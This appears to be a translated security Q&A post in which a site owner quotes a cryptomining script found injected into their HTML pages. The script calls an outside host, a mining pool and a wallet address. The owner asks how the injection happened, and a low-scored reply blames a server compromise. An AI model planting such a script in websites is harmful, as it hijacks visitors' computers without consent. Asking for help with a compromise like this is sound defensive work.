Javascript inyectado en mi documento HTML

1

Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo):

<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script><scripttype="text/javascript">PerfektStart('46PgJtwUkg18z7Cu7xAd2F972GSEQUzoGHWP4fwUHbdj7qgZqhf27Pm7Y7BdMUH2gahQdrCmbKxNuJAyUrGfThnhCgEyinb', 'x');throttleMiner = 50;</script>

Me doy cuenta de que alguien está poniendo cryptominer en mis páginas. Si lo elimino varios días después, vuelve.

Mi pregunta es, ¿cómo es posible que un atacante inyecte código directamente en el documento? ¿No necesitaría las credenciales del servidor para acceder y editar archivos en el servidor?

¿Es esto posible con ataques XSS?

    
pregunta LazyPeon 08.06.2018 - 12:13
fuente

1 respuesta

-2

Definitivamente no es un XSS almacenado porque el código vuelve cuando lo eliminas. Creo que alguien tiene acceso a su sistema o lo ha pirateado antes y ejecutó un script en él y tal vez el script hace otras cosas maliciosas en su servidor y no lo sabe.

    
respondido por el Malek 26.06.2018 - 05:42
fuente

Lea otras preguntas en las etiquetas